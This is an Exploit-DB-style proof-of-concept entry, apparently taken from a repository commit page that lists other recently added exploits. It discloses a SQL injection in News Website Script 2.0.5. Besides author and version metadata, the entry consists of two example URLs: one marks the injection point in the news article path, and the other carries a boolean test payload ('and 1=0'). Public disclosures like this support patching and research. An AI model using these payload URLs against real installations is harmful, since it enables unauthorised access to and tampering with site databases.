bb86158c6e
7 changes to exploits/shellcodes Xlight FTP Server 3.9.1 - Buffer Overflow (PoC) Jenkins - Remote Code Execution Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC) Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution zzzphp CMS 1.6.1 - Remote Code Execution PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection News Website Script 2.0.5 - SQL Injection Advance Gift Shop Pro Script 2.0.3 - SQL Injection Drupal < 8.6.9 - REST Module Remote Code Execution
15 lines
No EOL
560 B
Text
15 lines
No EOL
560 B
Text
# Exploit Title: News Website Script 2.0.5 - SQL Injection
|
|
# Exploit Author: Mr Winst0n
|
|
# Author E-mail: manamtabeshekan[@]gmail[.]com
|
|
# Discovery Date: February 22, 2019
|
|
# Vendor Homepage: http://www.phpscriptsmall.com/
|
|
# Software Link : https://www.phpscriptsmall.com/product/news-website-script/
|
|
# Tested Version: 2.0.5
|
|
# Tested on: Kali linux, Windows 8.1
|
|
|
|
|
|
# PoC:
|
|
|
|
# http://localhost/[PATH]/index.php/show/news/11 [SQL]/
|
|
|
|
# http://localhost/[PATH]/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri |